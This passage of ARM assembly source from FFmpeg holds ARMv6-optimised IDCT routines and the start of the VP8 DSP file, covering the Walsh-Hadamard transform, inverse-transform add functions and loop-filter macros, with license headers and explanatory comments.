ldr r1, [sp, #128] // reload dest
ldr r2, [sp, #(128+4)] // reload line_size
idct_rows idct_col_add_armv6, 1
add sp, sp, #(128+8) // drop temp block + saved dest/line_size
pop {r4-r11, pc}
endfunc
/* ff_simple_idct_put_armv6(uint8_t *dest, int line_size, int16_t *data); */
// IDCT then store-with-saturation into dest. Same structure as the
// add variant above, but overwrites the destination pixels.
function ff_simple_idct_put_armv6, export=1
push {r0, r1, r4-r11, lr}
sub sp, sp, #128 // temp 8x8 int16 block
mov r0, r2
mov r1, sp
idct_rows idct_row_armv6, 2
mov r0, sp
ldr r1, [sp, #128] // reload dest
ldr r2, [sp, #(128+4)] // reload line_size
idct_rows idct_col_put_armv6, 1
add sp, sp, #(128+8) // drop temp block + saved dest/line_size
pop {r4-r11, pc}
endfunc
/* ==== end of simple_idct_armv6.S section (repo Akagi201/ffmpeg-xcode) ==== */
/* ==== begin ffmpeg-3.0.2/libavcodec/arm/vp8dsp_armv6.S ==== */
/*
* VP8 ARMv6 optimisations
*
* Copyright (c) 2010 Google Inc.
* Copyright (c) 2010 Rob Clark <rob@ti.com>
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
* This code was partially ported from libvpx, which uses this license:
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* * Neither the name of Google nor the names of its contributors may
* be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "libavutil/arm/asm.S"
@ idct
@ void vp8_luma_dc_wht(int16_t block[4][4][16], int16_t dc[16])
@ Inverse Walsh-Hadamard transform of the 4x4 luma DC block.
@ Works on two 16-bit values per register (uadd16/usub16) so each pass
@ handles two columns/rows at once; input dc[] is zeroed as it is read.
@ Results are >>3 (with the +3 rounding bias folded in up front) and
@ scattered to block[i][j][0], i.e. every 32 bytes.
function ff_vp8_luma_dc_wht_armv6, export=1
push {r4-r10, lr}
ldm r1, {r2-r9}
mov r10, #0
mov lr, #0
@ First (vertical) pass, interleaved with zeroing dc[].
uadd16 r12, r2, r8 @ t0[0,1]
usub16 r2, r2, r8 @ t3[0,1]
stm r1!, {r10, lr}
uadd16 r8, r4, r6 @ t1[0,1]
usub16 r4, r4, r6 @ t2[0,1]
stm r1!, {r10, lr}
uadd16 r6, r12, r8 @ dc0[0,1]
usub16 r12, r12, r8 @ dc2[0,1]
stm r1!, {r10, lr}
uadd16 r8, r2, r4 @ dc1[0,1]
usub16 r2, r2, r4 @ dc3[0,1]
stm r1!, {r10, lr}
uadd16 lr, r3, r9 @ t0[2,3]
usub16 r3, r3, r9 @ t3[2,3]
uadd16 r9, r5, r7 @ t1[2,3]
usub16 r5, r5, r7 @ t2[2,3]
uadd16 r7, lr, r9 @ dc0[2,3]
usub16 lr, lr, r9 @ dc2[2,3]
uadd16 r9, r3, r5 @ dc1[2,3]
usub16 r3, r3, r5 @ dc3[2,3]
mov r1, #3
orr r1, r1, #0x30000 @ 3 | 3 (round)
@ Transpose the intermediate values via pack instructions, adding the
@ rounding bias to the first column pairs.
pkhbt r4, r6, r8, lsl #16 @ dc{0,1}[0]
pkhtb r6, r8, r6, asr #16 @ dc{0,1}[1]
pkhbt r5, r12, r2, lsl #16 @ dc{2,3}[0]
pkhtb r12, r2, r12, asr #16 @ dc{2,3}[1]
pkhbt r8, r7, r9, lsl #16 @ dc{0,1}[2]
uadd16 r4, r4, r1
uadd16 r5, r5, r1
pkhtb r7, r9, r7, asr #16 @ dc{0,1}[3]
pkhbt r2, lr, r3, lsl #16 @ dc{2,3}[2]
pkhtb lr, r3, lr, asr #16 @ dc{2,3}[3]
@ Second (horizontal) pass.
uadd16 r9, r4, r7 @ t0[0,1]
uadd16 r3, r5, lr @ t0[2,3]
usub16 r4, r4, r7 @ t3[0,1]
usub16 r5, r5, lr @ t3[2,3]
uadd16 r7, r6, r8 @ t1[0,1]
uadd16 lr, r12, r2 @ t1[2,3]
usub16 r6, r6, r8 @ t2[0,1]
usub16 r12, r12, r2 @ t2[2,3]
uadd16 r8, r9, r7 @ block[0,1][0]
uadd16 r2, r3, lr @ block[2,3][0]
usub16 r9, r9, r7 @ block[0,1][2]
usub16 r3, r3, lr @ block[2,3][2]
uadd16 r7, r4, r6 @ block[0,1][1]
uadd16 lr, r5, r12 @ block[2,3][1]
usub16 r4, r4, r6 @ block[0,1][3]
usub16 r5, r5, r12 @ block[2,3][3]
@ Extract low halves >>3 (sbfx does sign-extend+shift in one insn).
#if HAVE_ARMV6T2_EXTERNAL
sbfx r6, r8, #3, #13
sbfx r12, r7, #3, #13
sbfx r1, r9, #3, #13
sbfx r10, r4, #3, #13
#else
sxth r6, r8
sxth r12, r7
sxth r1, r9
sxth r10, r4
asr r6, #3 @ block[0][0]
asr r12, #3 @ block[0][1]
asr r1, #3 @ block[0][2]
asr r10, #3 @ block[0][3]
#endif
@ Store row 0, computing row 1 (high halves, asr #19 = >>16 then >>3).
strh r6, [r0], #32
asr r8, r8, #19 @ block[1][0]
strh r12, [r0], #32
asr r7, r7, #19 @ block[1][1]
strh r1, [r0], #32
asr r9, r9, #19 @ block[1][2]
strh r10, [r0], #32
asr r4, r4, #19 @ block[1][3]
strh r8, [r0], #32
asr r6, r2, #19 @ block[3][0]
strh r7, [r0], #32
asr r12, lr, #19 @ block[3][1]
strh r9, [r0], #32
asr r1, r3, #19 @ block[3][2]
strh r4, [r0], #32
asr r10, r5, #19 @ block[3][3]
#if HAVE_ARMV6T2_EXTERNAL
sbfx r2, r2, #3, #13
sbfx lr, lr, #3, #13
sbfx r3, r3, #3, #13
sbfx r5, r5, #3, #13
#else
sxth r2, r2
sxth lr, lr
sxth r3, r3
sxth r5, r5
asr r2, #3 @ block[2][0]
asr lr, #3 @ block[2][1]
asr r3, #3 @ block[2][2]
asr r5, #3 @ block[2][3]
#endif
strh r2, [r0], #32
strh lr, [r0], #32
strh r3, [r0], #32
strh r5, [r0], #32
strh r6, [r0], #32
strh r12, [r0], #32
strh r1, [r0], #32
strh r10, [r0], #32
pop {r4-r10, pc}
endfunc
@ void vp8_luma_dc_wht_dc(int16_t block[4][4][16], int16_t dc[16])
@ DC-only special case of the WHT above: every output is (dc[0]+3)>>3.
@ dc[0] is cleared, and the value is written to all 16 block[i][j][0]
@ slots (stride 32 bytes).
function ff_vp8_luma_dc_wht_dc_armv6, export=1
ldrsh r2, [r1]
mov r3, #0
add r2, r2, #3 @ rounding bias
strh r3, [r1] @ clear dc[0]
asr r2, r2, #3
.rept 16
strh r2, [r0], #32
.endr
bx lr
endfunc
@ void vp8_idct_add(uint8_t *dst, int16_t block[16], int stride)
@ VP8 4x4 inverse transform, result added to dst with saturation.
@ Pass 1 (loop 1:) transforms columns two at a time into a 32-byte
@ stack buffer and zeroes block[] behind itself; pass 2 (loop 2:)
@ transforms rows, rounds (>>3), adds to the destination pixels and
@ stores two lines per iteration.
function ff_vp8_idct_add_armv6, export=1
push {r4-r12, lr}
sub sp, sp, #32 @ temp buffer for pass-1 output
movw r3, #20091 @ cospi8sqrt2minus1
movw r4, #35468 @ sinpi8sqrt2
mov r5, sp
1:
ldr r6, [r1, #8] @ i5 | i4 = block1[1] | block1[0]
ldr lr, [r1, #16] @ i9 | i8 = block2[1] | block2[0]
ldr r12, [r1, #24] @ i13 | i12 = block3[1] | block3[0]
@ smulw* = 32x16 -> top 32 bits of 48-bit product, i.e. x*c >> 16.
smulwt r9, r3, r6 @ ip[5] * cospi8sqrt2minus1
smulwb r7, r3, r6 @ ip[4] * cospi8sqrt2minus1
smulwt r10, r4, r6 @ ip[5] * sinpi8sqrt2
smulwb r8, r4, r6 @ ip[4] * sinpi8sqrt2
pkhbt r7, r7, r9, lsl #16 @ 5c | 4c
smulwt r11, r3, r12 @ ip[13] * cospi8sqrt2minus1
pkhbt r8, r8, r10, lsl #16 @ 5s | 4s = t2 first half
uadd16 r6, r6, r7 @ 5c+5 | 4c+4 = t3 first half
smulwb r9, r3, r12 @ ip[12] * cospi8sqrt2minus1
smulwt r7, r4, r12 @ ip[13] * sinpi8sqrt2
smulwb r10, r4, r12 @ ip[12] * sinpi8sqrt2
pkhbt r9, r9, r11, lsl #16 @ 13c | 12c
ldr r11, [r1] @ i1 | i0
pkhbt r10, r10, r7, lsl #16 @ 13s | 12s = t3 second half
uadd16 r7, r12, r9 @ 13c+13 | 12c+12 = t2 2nd half
uadd16 r6, r6, r10 @ d = t3
uadd16 r10, r11, lr @ a = t0
usub16 r7, r8, r7 @ c = t2
usub16 r8, r11, lr @ b = t1
uadd16 r9, r10, r6 @ a+d = tmp{0,1}[0]
usub16 r10, r10, r6 @ a-d = tmp{0,1}[3]
uadd16 r6, r8, r7 @ b+c = tmp{0,1}[1]
usub16 r7, r8, r7 @ b-c = tmp{0,1}[2]
mov r8, #0
cmp sp, r5 @ first or second column pair?
str r6, [r5, #8] @ o5 | o4
str r7, [r5, #16] @ o9 | o8
str r10, [r5, #24] @ o13 | o12
str r9, [r5], #4 @ o1 | o0
@ Zero the coefficients we just consumed.
str r8, [r1, #8]
str r8, [r1, #16]
str r8, [r1, #24]
str r8, [r1], #4
beq 1b
mov r5, #2 @ two row-pair iterations
2:
pop {r1, r6, r12, lr} @ pull two rows of pass-1 output off the temp buffer
smulwt r9, r3, r12 @ ip[5] * cospi8sqrt2minus1
smulwt r7, r3, r1 @ ip[1] * cospi8sqrt2minus1
smulwt r10, r4, r12 @ ip[5] * sinpi8sqrt2
smulwt r8, r4, r1 @ ip[1] * sinpi8sqrt2
pkhbt r11, r1, r12, lsl #16 @ i4 | i0 = t0/t1 first half
pkhtb r1, r12, r1, asr #16 @ i5 | i1
pkhbt r7, r7, r9, lsl #16 @ 5c | 1c
pkhbt r8, r8, r10, lsl #16 @ 5s | 1s = t2 first half
pkhbt r9, r6, lr, lsl #16 @ i6 | i2 = t0/t1 second half
pkhtb r12, lr, r6, asr #16 @ i7 | i3
uadd16 r1, r7, r1 @ 5c+5 | 1c+1 = t3 first half
uadd16 r10, r11, r9 @ a = t0
usub16 r9, r11, r9 @ b = t1
smulwt r7, r3, r12 @ ip[7] * cospi8sqrt2minus1
smulwb lr, r3, r12 @ ip[3] * cospi8sqrt2minus1
smulwt r11, r4, r12 @ ip[7] * sinpi8sqrt2
smulwb r6, r4, r12 @ ip[3] * sinpi8sqrt2
subs r5, r5, #1
pkhbt r7, lr, r7, lsl #16 @ 7c | 3c
pkhbt r11, r6, r11, lsl #16 @ 7s | 3s = t3 second half
mov r6, #0x4
orr r6, r6, #0x40000 @ rounding bias 4 | 4
uadd16 r12, r7, r12 @ 7c+7 | 3c+3 = t2 second half
uadd16 r10, r10, r6 @ t0 + 4
uadd16 r9, r9, r6 @ t1 + 4
usub16 lr, r8, r12 @ c (o5 | o1) = t2
uadd16 r12, r11, r1 @ d (o7 | o3) = t3
usub16 r1, r9, lr @ b-c = dst{0,1}[2]
uadd16 r7, r10, r12 @ a+d = dst{0,1}[0]
usub16 r12, r10, r12 @ a-d = dst{0,1}[3]
uadd16 r10, r9, lr @ b+c = dst{0,1}[1]
@ Final >>3, repack to bytes, add to pixels, saturate and store.
asr lr, r1, #3 @ o[1][2]
asr r9, r12, #3 @ o[1][3]
pkhtb r8, lr, r7, asr #19 @ o[1][0,2]
pkhtb r11, r9, r10, asr #19 @ o[1][1,3]
ldr lr, [r0] @ dst line 0
sxth r12, r12
ldr r9, [r0, r2] @ dst line 1
sxth r1, r1
#if HAVE_ARMV6T2_EXTERNAL
sbfx r7, r7, #3, #13
sbfx r10, r10, #3, #13
#else
sxth r7, r7
sxth r10, r10
asr r7, #3 @ o[0][0]
asr r10, #3 @ o[0][1]
#endif
pkhbt r7, r7, r1, lsl #13 @ o[0][0,2]
pkhbt r10, r10, r12, lsl #13 @ o[0][1,3]
uxtab16 r7, r7, lr @ add even dst bytes
uxtab16 r10, r10, lr, ror #8 @ add odd dst bytes
uxtab16 r8, r8, r9
uxtab16 r11, r11, r9, ror #8
usat16 r7, #8, r7
usat16 r10, #8, r10
usat16 r8, #8, r8
usat16 r11, #8, r11
orr r7, r7, r10, lsl #8 @ re-interleave bytes
orr r8, r8, r11, lsl #8
str r8, [r0, r2]
str_post r7, r0, r2, lsl #1 @ store and advance dst two lines
bne 2b
pop {r4-r12, pc}
endfunc
@ void vp8_idct_dc_add(uint8_t *dst, int16_t block[16], int stride)
@ DC-only inverse transform: add (block[0]+4)>>3 to all 16 pixels of a
@ 4x4 area, with unsigned 8-bit saturation. block[0] is cleared and r1
@ advanced by 32 bytes (one 16-coeff block) for the add4 callers below.
function ff_vp8_idct_dc_add_armv6, export=1
push {r4-r6, lr}
add r6, r0, r2, lsl #1 @ r6 = dst + 2 lines
ldrsh r3, [r1]
mov r4, #0
add r3, r3, #4 @ rounding bias
strh r4, [r1], #32 @ clear dc, step to next sub-block
asr r3, #3
ldr r5, [r0]
ldr r4, [r0, r2]
pkhbt r3, r3, r3, lsl #16 @ replicate dc into both halfwords
@ uxtab16 adds dc to bytes 0,2 (and, with ror #8, bytes 1,3).
uxtab16 lr, r3, r5 @ a1+2 | a1+0
uxtab16 r5, r3, r5, ror #8 @ a1+3 | a1+1
uxtab16 r12, r3, r4
uxtab16 r4, r3, r4, ror #8
usat16 lr, #8, lr
usat16 r5, #8, r5
usat16 r12, #8, r12
usat16 r4, #8, r4
orr lr, lr, r5, lsl #8 @ re-interleave bytes
ldr r5, [r6]
orr r12, r12, r4, lsl #8
ldr r4, [r6, r2]
str lr, [r0]
uxtab16 lr, r3, r5
str r12, [r0, r2]
uxtab16 r5, r3, r5, ror #8
uxtab16 r12, r3, r4
uxtab16 r4, r3, r4, ror #8
usat16 lr, #8, lr
usat16 r5, #8, r5
usat16 r12, #8, r12
usat16 r4, #8, r4
orr lr, lr, r5, lsl #8
orr r12, r12, r4, lsl #8
str lr, [r6]
str r12, [r6, r2]
pop {r4-r6, pc}
endfunc
@ void vp8_idct_dc_add4uv(uint8_t *dst, int16_t block[4][16], int stride)
@ Four DC-only adds covering an 8x8 chroma area (2x2 grid of 4x4
@ blocks); dc_add advances r1 to the next block itself.
@ NOTE(review): r4 appears pushed only to keep the stack 8-byte
@ aligned across the calls -- confirm.
function ff_vp8_idct_dc_add4uv_armv6, export=1
push {r4, lr}
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4 @ right 4x4 block
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, r2, lsl #2 @ down 4 lines...
sub r0, r0, #4 @ ...back to left column
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
pop {r4, pc}
endfunc
@ void vp8_idct_dc_add4y(uint8_t *dst, int16_t block[4][16], int stride)
@ Four DC-only adds covering a 16x4 luma strip (4 blocks side by side);
@ dc_add advances r1 to the next block itself.
function ff_vp8_idct_dc_add4y_armv6, export=1
push {r4, lr}
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
add r0, r0, #4
bl X(ff_vp8_idct_dc_add_armv6)
pop {r4, pc}
endfunc
@ loopfilter
@ 4x4 byte-matrix transpose: inputs \i0-\i3 each hold one row of four
@ pixels; outputs \o0-\o3 each hold one column. Built from byte
@ extracts (uxtb16) and halfword packs (pkh*). Clobbers \i0-\i3.
.macro transpose o3, o2, o1, o0, i0, i1, i2, i3
uxtb16 \o1, \i1 @ xx 12 xx 10
uxtb16 \o0, \i0 @ xx 02 xx 00
uxtb16 \o3, \i3 @ xx 32 xx 30
uxtb16 \o2, \i2 @ xx 22 xx 20
orr \o1, \o0, \o1, lsl #8 @ 12 02 10 00
orr \o3, \o2, \o3, lsl #8 @ 32 22 30 20
uxtb16 \i1, \i1, ror #8 @ xx 13 xx 11
uxtb16 \i3, \i3, ror #8 @ xx 33 xx 31
uxtb16 \i0, \i0, ror #8 @ xx 03 xx 01
uxtb16 \i2, \i2, ror #8 @ xx 23 xx 21
orr \i0, \i0, \i1, lsl #8 @ 13 03 11 01
orr \i2, \i2, \i3, lsl #8 @ 33 23 31 21
pkhtb \o2, \o3, \o1, asr #16 @ 32 22 12 02
pkhbt \o0, \o1, \o3, lsl #16 @ 30 20 10 00
pkhtb \o3, \i2, \i0, asr #16 @ 33 23 13 03
pkhbt \o1, \i0, \i2, lsl #16 @ 31 21 11 01
.endm
@ Simple loop filter on 4 pixels at once (SIMD within register).
@ In: r3=p1, r4=p0, r5=q0, r6=q1, r12=flimit (replicated),
@     r2=0x80808080, lr=0. Out: filtered r4=p0, r5=q0.
@ Branches to local label 2f when no pixel passes the filter mask.
@ Arithmetic is done in signed domain via the ^0x80 bias trick.
.macro simple_filter
uqsub8 r7, r3, r6 @ p1 - q1
uqsub8 r8, r6, r3 @ q1 - p1
uqsub8 r10, r4, r5 @ p0 - q0
uqsub8 r9, r5, r4 @ q0 - p0
orr r7, r7, r8 @ abs(p1 - q1)
orr r9, r9, r10 @ abs(p0 - q0)
uhadd8 r7, r7, lr @ abs(p1 - q2) >> 1
uqadd8 r9, r9, r9 @ abs(p0 - q0) * 2
uqadd8 r7, r7, r9 @ abs(p0 - q0)*2 + abs(p1-q1)/2
mvn r8, #0
usub8 r10, r12, r7 @ compare to flimit
sel r10, r8, lr @ filter mask: F or 0
cmp r10, #0
beq 2f
eor r3, r3, r2 @ ps1
eor r6, r6, r2 @ qs1
eor r4, r4, r2 @ ps0
eor r5, r5, r2 @ qs0
qsub8 r3, r3, r6 @ vp8_filter = p1 - q1
qsub8 r6, r5, r4 @ q0 - p0
qadd8 r3, r3, r6 @ += q0 - p0
lsr r7, r2, #5 @ 0x04040404
qadd8 r3, r3, r6 @ += q0 - p0
sub r9, r7, r2, lsr #7 @ 0x03030303
qadd8 r3, r3, r6 @ vp8_filter = p1-q1 + 3*(q0-p0)
and r3, r3, r10 @ vp8_filter &= mask
qadd8 r9, r3, r9 @ Filter2 = vp8_filter + 3
qadd8 r3, r3, r7 @ Filter1 = vp8_filter + 4
@ Three signed-halving adds with 0 = arithmetic >> 3 per byte.
shadd8 r9, r9, lr
shadd8 r3, r3, lr
shadd8 r9, r9, lr
shadd8 r3, r3, lr
shadd8 r9, r9, lr @ Filter2 >>= 3
shadd8 r3, r3, lr @ Filter1 >>= 3
qadd8 r4, r4, r9 @ u = p0 + Filter2
qsub8 r5, r5, r3 @ u = q0 - Filter1
eor r4, r4, r2 @ *op0 = u ^ 0x80
eor r5, r5, r2 @ *oq0 = u ^ 0x80
.endm
@ void vp8_v_loop_filter16_simple(uint8_t *dst, int stride, int flim)
@ Vertical (horizontal-edge) simple filter across 16 pixels, processed
@ as four groups of 4. flim is replicated to all four bytes of r12.
function ff_vp8_v_loop_filter16_simple_armv6, export=1
push {r4-r11, lr}
orr r2, r2, r2, lsl #16
mov r11, #4 @ 4 groups of 4 pixels
mov lr, #0
orr r12, r2, r2, lsl #8 @ flim in every byte
mov32 r2, 0x80808080
1:
ldr_nreg r3, r0, r1, lsl #1 @ p1
ldr_nreg r4, r0, r1 @ p0
ldr r5, [r0] @ q0
ldr r6, [r0, r1] @ q1
simple_filter @ falls through to 2: when mask is all-zero
T sub r7, r0, r1
str r5, [r0] @ oq0
A str r4, [r0, -r1] @ op0
T str r4, [r7]
2:
subs r11, r11, #1
add r0, r0, #4 @ next group of 4 pixels
bne 1b
pop {r4-r11, pc}
endfunc
@ Accumulate the p-side part of the normal filter mask.
@ In: r9=p3, r10=p2, r11=p1, r12=p0, r2=limit (replicated), r3=thresh.
@ Out: lr = accumulated limit-exceeded flags, r6 = abs(p1-p0),
@      r8 = abs(p1-p0) compared to thresh (for the hev mask).
.macro filter_mask_p
uqsub8 r6, r9, r10 @ p3 - p2
uqsub8 r7, r10, r9 @ p2 - p3
uqsub8 r8, r10, r11 @ p2 - p1
uqsub8 r10, r11, r10 @ p1 - p2
orr r6, r6, r7 @ abs(p3-p2)
orr r8, r8, r10 @ abs(p2-p1)
uqsub8 lr, r6, r2 @ compare to limit
uqsub8 r8, r8, r2 @ compare to limit
uqsub8 r6, r11, r12 @ p1 - p0
orr lr, lr, r8
uqsub8 r7, r12, r11 @ p0 - p1
orr r6, r6, r7 @ abs(p1-p0)
uqsub8 r7, r6, r2 @ compare to limit
uqsub8 r8, r6, r3 @ compare to thresh
orr lr, lr, r7
.endm
@ Compute the edge-strength term abs(p0-q0)*2 + abs(p1-q1)/2 in r12,
@ for comparison against flimE.
@ In: r9=q0, r10=q1, r11=p1, r12=p0. Clobbers r6, r7, r11.
.macro filter_mask_pq
uqsub8 r6, r11, r10 @ p1 - q1
uqsub8 r7, r10, r11 @ q1 - p1
uqsub8 r11, r12, r9 @ p0 - q0
uqsub8 r12, r9, r12 @ q0 - p0
orr r6, r6, r7 @ abs(p1-q1)
orr r12, r11, r12 @ abs(p0-q0)
mov32 r7, 0x7f7f7f7f
uqadd8 r12, r12, r12 @ abs(p0-q0) * 2
and r6, r7, r6, lsr #1 @ abs(p1-q1) / 2 (mask cross-byte bleed)
uqadd8 r12, r12, r6 @ abs(p0-q0) * 2 + abs(p1-q1)/2
.endm
@ Build the complete filter mask for a vertical (horizontal-edge)
@ filter: p-side terms, the p/q edge term, then the q-side terms.
@ In: r9-r12 = p3..p0 (from caller), r2=limit, r3=thresh, r4=flimE.
@ Out: lr = per-byte mask (0xff where filtering applies), r6 = hev
@      precursor abs(q1-q0) vs thresh, r0 rewound to point at q0's row
@      minus 2 lines (i.e. back at p1's predecessor position).
.macro filter_mask_v
filter_mask_p
ldr r10, [r0, r1] @ q1
ldr_post r9, r0, r1, lsl #1 @ q0
filter_mask_pq
ldr r11, [r0] @ q2
uqsub8 r7, r9, r10 @ q0 - q1
uqsub8 r6, r10, r9 @ q1 - q0
uqsub8 r12, r12, r4 @ compare to flimit
uqsub8 r9, r11, r10 @ q2 - q1
uqsub8 r10, r10, r11 @ q1 - q2
orr lr, lr, r12
ldr r12, [r0, r1] @ q3
orr r6, r7, r6 @ abs(q1-q0)
orr r10, r9, r10 @ abs(q2-q1)
uqsub8 r9, r12, r11 @ q3 - q2
uqsub8 r11, r11, r12 @ q2 - q3
uqsub8 r7, r6, r2 @ compare to limit
uqsub8 r10, r10, r2 @ compare to limit
uqsub8 r6, r6, r3 @ compare to thresh
orr r9, r9, r11 @ abs(q3-q2)
orr lr, lr, r7
orr lr, lr, r10
uqsub8 r9, r9, r2 @ compare to limit
orr lr, lr, r9
mov r12, #0
usub8 lr, r12, lr @ set GE flags where nothing exceeded
mvn r11, #0
sel lr, r11, r12 @ filter mask
sub r0, r0, r1, lsl #1
.endm
@ Build the complete filter mask for a horizontal (vertical-edge)
@ filter. Transposes the loaded 4x4 pixel tiles so the same byte-wise
@ mask logic as the vertical case can be reused; intermediate values
@ (p1, p0, flag accumulator) are spilled to the stack frame.
@ Out: lr = per-byte filter mask, r6 = abs(q1-q0) vs thresh.
.macro filter_mask_h
transpose r12, r11, r10, r9, r6, r7, r8, lr
filter_mask_p
stm sp, {r8, r11, r12, lr} @ spill thresh-flags, p1, p0, accumulator
sub r0, r0, r1, lsl #2
add r0, r0, #4
@ Load and transpose the q-side 4x4 tile.
ldr r7, [r0, r1]
ldr_post r6, r0, r1, lsl #1
ldr lr, [r0, r1]
ldr r8, [r0]
transpose r12, r11, r10, r9, r6, r7, r8, lr
uqsub8 r8, r12, r11 @ q3 - q2
uqsub8 lr, r11, r12 @ q2 - q3
uqsub8 r7, r9, r10 @ q0 - q1
uqsub8 r6, r10, r9 @ q1 - q0
uqsub8 r12, r11, r10 @ q2 - q1
uqsub8 r11, r10, r11 @ q1 - q2
orr r8, r8, lr @ abs(q3-q2)
orr r6, r7, r6 @ abs(q1-q0)
orr r11, r12, r11 @ abs(q2-q1)
ldr lr, [sp, #12] @ load back (f)limit accumulator
uqsub8 r8, r8, r2 @ compare to limit
uqsub8 r7, r6, r2 @ compare to limit
uqsub8 r11, r11, r2 @ compare to limit
orr lr, lr, r8
uqsub8 r8, r6, r3 @ compare to thresh
orr lr, lr, r7
ldr r12, [sp, #8] @ p1
orr lr, lr, r11
ldr r11, [sp, #4] @ p0
filter_mask_pq
mov r10, #0
uqsub8 r12, r12, r4 @ compare to flimit
mvn r11, #0
orr lr, lr, r12
usub8 lr, r10, lr @ set GE flags where nothing exceeded
sel lr, r11, r10 @ filter mask
.endm
@ Core normal-filter arithmetic, shared by inner and edge filters.
@ In: r7=p1, r8=p0, r9=q0, r10=q1, r6=hev mask, lr=filter mask.
@ Biases pixels into signed domain (^0x80), saves ps1/ps0/qs0/qs1 on
@ the stack frame, and computes:
@   lr = Filter2 = clamp(vp8_filter+3)>>3, r7 = Filter1 = clamp(+4)>>3
@ \inner selects where the hev mask is applied (to the raw filter for
@ the inner filter, to a copy kept in r12 for the edge filter).
.macro filter inner
mov32 r12, 0x80808080
eor r11, r7, r12 @ ps1
eor r8, r8, r12 @ ps0
eor r9, r9, r12 @ qs0
eor r10, r10, r12 @ qs1
stm sp, {r8-r11} @ spill ps0, qs0, qs1, ps1
qsub8 r7, r11, r10 @ vp8_signed_char_clamp(ps1-qs1)
qsub8 r8, r9, r8 @ vp8_signed_char_clamp(vp8_filter + 3 * ( qs0 - ps0))
.if \inner
and r7, r7, r6 @ vp8_filter &= hev
.endif
qadd8 r7, r7, r8
lsr r10, r12, #5 @ 0x04040404
qadd8 r7, r7, r8
sub r9, r10, r12, lsr #7 @ 0x03030303
qadd8 r7, r7, r8
and r7, r7, lr @ vp8_filter &= mask
.if !\inner
mov r12, r7 @ Filter2
and r7, r7, r6 @ Filter2 &= hev
.endif
qadd8 lr, r7, r9 @ Filter2 = vp8_signed_char_clamp(vp8_filter+3)
qadd8 r7, r7, r10 @ Filter1 = vp8_signed_char_clamp(vp8_filter+4)
mov r9, #0
@ Three signed-halving adds with 0 = arithmetic >> 3 per byte.
shadd8 lr, lr, r9 @ Filter2 >>= 3
shadd8 r7, r7, r9 @ Filter1 >>= 3
shadd8 lr, lr, r9
shadd8 r7, r7, r9
shadd8 lr, lr, r9 @ Filter2
shadd8 r7, r7, r9 @ Filter1
.endm
@ Vertical-filter wrapper: derive the hev mask from the thresh
@ comparisons (r6, r8), reload p1/p0/q0/q1 around the edge, then run
@ the shared filter arithmetic.
.macro filter_v inner
orr r10, r6, r8 @ calculate vp8_hevmask
ldr_nreg r7, r0, r1, lsl #1 @ p1
usub8 r10, r12, r10
ldr_nreg r8, r0, r1 @ p0
sel r6, r12, r11 @ obtain vp8_hevmask
ldr r9, [r0] @ q0
ldr r10, [r0, r1] @ q1
filter \inner
.endm
@ Horizontal-filter wrapper: derive the hev mask, spill it with the
@ filter mask, reload the 4x4 tile around the edge and transpose it so
@ p1/p0/q0/q1 land in r7-r10, then run the shared filter arithmetic.
.macro filter_h inner
orr r9, r6, r8
usub8 r9, r12, r9
sel r6, r12, r11 @ hev mask
stm sp, {r6, lr} @ spill hev mask and filter mask
ldr_nreg r12, r0, r1, lsl #1
ldr_nreg r11, r0, r1
ldr r6, [r0]
ldr lr, [r0, r1]
transpose r10, r9, r8, r7, r12, r11, r6, lr
ldm sp, {r6, lr} @ restore hev mask and filter mask
filter \inner
.endm
@ Finish the inner filter: apply Filter1/Filter2 to qs0/ps0, then the
@ halved, hev-masked filter to qs1/ps1, and un-bias all four outputs.
@ In: lr=Filter2, r7=Filter1, r10=0x08080808 (from filter), r6=hev,
@     stack = {ps0, qs0, qs1, ps1}, r11=ps1.
@ Out: r11=op1, r8=op0, r9=oq0, r10=oq1.
.macro filter_inner
ldm sp, {r8, r9} @ ps0, qs0
lsr r10, r10, #2 @ 0x01010101
qadd8 r8, r8, lr @ u = vp8_signed_char_clamp(ps0 + Filter2)
mov lr, #0
qsub8 r9, r9, r7 @ u = vp8_signed_char_clamp(qs0 - Filter1)
sadd8 r7, r7, r10 @ vp8_filter += 1
